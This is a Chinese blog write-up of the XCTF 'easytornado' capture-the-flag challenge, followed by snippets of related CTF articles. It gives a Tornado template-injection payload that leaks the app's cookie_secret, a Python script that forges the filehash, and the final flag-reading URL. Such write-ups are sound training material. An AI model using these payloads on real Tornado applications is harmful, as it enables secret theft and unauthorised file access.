XCTF-Web-高手区-easytornado

最新推荐文章于 2023-03-17 14:00:21 发布
最新推荐文章于 2023-03-17 14:00:21 发布
阅读量367 收藏
点赞数
分类专栏: CTF刷题 文章标签: XCTF-Web-高手区
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41617034/article/details/118101443
版权

题目

在这里插入图片描述

解题

1、访问url

在这里插入图片描述
点进去看看
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

2、直接访问/fllllllllllllag文件

在这里插入图片描述
发现报错了,但我们发现URL中的Error是我们返回的Error,那么我们再来测试一下
在这里插入图片描述
在这里插入图片描述
发现可能存在SSTI漏洞,但被过滤了部分参数,所以不能使用

3、这里再回到题目信息easytornado,可以判断出可能是一个python的tornado漏洞

因为我没学过python的框架,就不详细解析了,只写payload
这里我们要访问/fllllllllllllag文件,并且还要filehash正确,那么我们目前的问题就是获取fllllllllllllag所对应的filehash的值
再由hints.txt可以可以看出,filehash的计算公式如下

md5(cookie_secret+md5(filename))

那么如何获取cookie_secret呢?我们这边直接上payload

http://111.200.241.244:51903/error?msg={{handler.settings}}

在这里插入图片描述
这时我们要访问的url是

http://111.200.241.244:51903/file?filename=/fllllllllllllag&filehash=md5(c3169c94-9dde-4d74-ab37-4300ced3cc8c+md5(/fllllllllllllag))

此时我们来计算filehash

# -*- coding: UTF-8 -*-
import hashlib

result = hashlib.md5()
result.update('/fllllllllllllag'.encode('utf-8'))
filename_md5 = result.hexdigest()
result = hashlib.md5()
result.update(('c3169c94-9dde-4d74-ab37-4300ced3cc8c' + filename_md5).encode('utf-8'))
print(result.hexdigest())

在这里插入图片描述

最终payload

http://111.200.241.244:51903/file?filename=/fllllllllllllag&filehash=0b2258f726a9bd96f61d7c3eef39ca0f

在这里插入图片描述

1stPeak
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
XCTF系列 // Web | easytornado
qq_45805420的博客
08-08 1187
前言 本题涉及到的知识点有,Tornado 的 SSTI 漏洞、Tornado 中的 cookie_secret 值 以及 Python3 中的 hashlib 模块。 首先大概的介绍一下 Tornado 的相关概念。 Tornado Tornado 是使用 Python 开发的全栈式(full-stack)Web 框架和异步网络库。与以前提到过的 Flask 一样都是 Python 的一种 Web 开发框架。 Tornado render 模板注入 Tornado render 是 Python 中的一个
XCTFeasytornado题目
daqiangdetianxia的博客
07-07 219
py是个好工具,要多加以利用 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20200707170254527.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2RhcWlhbmdkZXRpYW54aWE=,size_16,color_FFFFFF,t_70 经过分析。看到题目的关键点在于找到cookie_sec.
XCTF攻防世界web进阶easytornado
qq_60787987的博客
04-02 3635
打开题目我们可以看到如下界面: 点开flag.txt看到 /flag.txt flag in /fllllllllllllag 提示我们flag所在的文件。 点开welcome.txt看到render,这里就涉及到本题目的核心知识,模板注入。这个等下再讲。 接下来,点开hints就看到 /hints.txt md5(cookie_secret+md5(filename)) 涉及到知识有 render是python中的一个渲染函数,也就是一种模板,通过调用的参数不同,生成不同的网页 ren
XCTF-攻防世界CTF平台-Web类——15、easytornado(SSTI服务器模板注入、Tornado 框架render渲染函数、MD5加密)
Onlyone_1314的博客
12-11 2716
目录标题找到注入点查看tornado的官方文档得到cookie_secret的值计算md5值得到flag 打开题目地址: 题目描述使用了Tornado 框架,Tornado是Python的一种 Web 服务器软件框架。 有三个文件,分别查看: 提示flag所在的文件/fllllllllllllag,url中GET方式提交了2个参数:filename=/flag.txt&filehash=6d9ebcb83324409e048e0d8086173713 提示使用了render函数,由于rend
xctf攻防世界 Web高手进阶 easytornado
l8947943的博客
08-05 7500
xctf攻防世界 Web高手进阶 easytornado
XCTF-HW-pipeline附件
最新发布
11-09
附件
XCTF-RE】新手练习-logmein
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/ez5t60
XCTF-RE】新手练习-maze
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/fr45py
XCTF-Mobile】新手练习-12.rar
09-01
题目:https://adworld.xctf.org.cn/task/answer?type=mobile&number=6&grade=0&id=5095&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/ctf/hackermind
XCTF-RE】新手练习-insanity
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/siwtcm
XCTF-WEB
qq_43661408的博客
06-22 490
post和get 题目链接:http://111.198.29.45:34348/ 解题思路 首先使用 get方式提交变量a等于1 即 http://111.198.29.45:34348/?a=1 得到 第二条信息 需要使用post提交一个变量b值为2 因此使用火狐自带的插件hackbar,但是现在火狐更新后不能使用了,替代hackbar的插件有了 Max hackbar 和 hackbar q...
XCTF篇:Web (高手进阶) 1-2题
小明师傅博客
06-20 473
1.baby_web 访问index.php F12查看发现重定向了,但是拿到flag 2.Training-WWW-Robots 访问robots.txt 完成 本来打算做1-12题的,后来发现第三题要漏洞复现
护网杯2018-easy tornado(BUUCTF
wyj_1216 House
02-07 2519
ssti模板注入 tornado框架 rander 题目 writeup 首先发现有三个文件,点进去看下 /flag.txt flag in /fllllllllllllag /file?filename=/flag.txt&filehash=a41fc7432da96c4b11c1bf1808f3417e /welcome.txt render /file?filename=/w...
2018护网杯easy_tornado(BUUCTF提供复现)
Sea_Sand息禅
09-26 4828
进入页面: 然后依次看一下: 1)/flag.txt 网页内容: /flag.txt flag in /fllllllllllllag url: file?filename=/flag.txt&filehash=9f1a5c8c40be3aafbc5e719d151b1d36 这个页面告诉我们,flag在/fllllllllllllag文件中 2)/welcome.txt 网页内容: ...
CTFWEB基础篇
qq_53058639的博客
03-17 3738
简介JavaScript 是互联网上最流行的脚本语言,这门语言可用于 HTML 和 web,更可广泛用于服务器、PC、笔记本电脑、平板电脑和智能手机等设备。作用JavaScript 是脚本语言JavaScript 是一种轻量级的编程语言。JavaScript 是可插入 HTML 页面的编程代码。JavaScript 插入 HTML 页面后,可由所有的现代浏览器执行。JavaScript 很容易学习。
XCTF web进阶wp(二)
0xdawn的博客
03-04 473
Web_php_include <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> strstr(...
攻防世界--url
qq_46263951的博客
01-10 1241
进入后页面显示no url,然后就没有其他的了,结合题目,猜测是url为参数 通过测试发现是以POST方式传参url 尝试使用伪协议读取文件 参考WP发现只有当text位置为www.baidu.com时才不会报错 base64后为,即可获得flag 参考文章: CTF中常用的php伪协议利用 - 1ndex- - 博客园 ...
ctf 题解
m0_68052766的博客
11-27 521
继续做题
CTFshow web41遇到的问题及解决方法
qq_45758851的博客
03-24 968
CTFshow web41 遇到的问题 由于电脑上本来只有python2.7,而通过学习羽师傅的python脚本发现需要导入urllib库,可是在pip的时候发现出现错误,远程库中没有这个模块。 ERROR: Could not find a version that satisfies the requirement urllib (from versions: none) ERROR: No matching distribution found for urllib 在学习脚本的时候,
web-ics-05
07-28
- *1* *3* [xctf-web-ics05](https://blog.csdn.net/zhejichensha_l7l/article/details/113530046)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

1stPeak

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值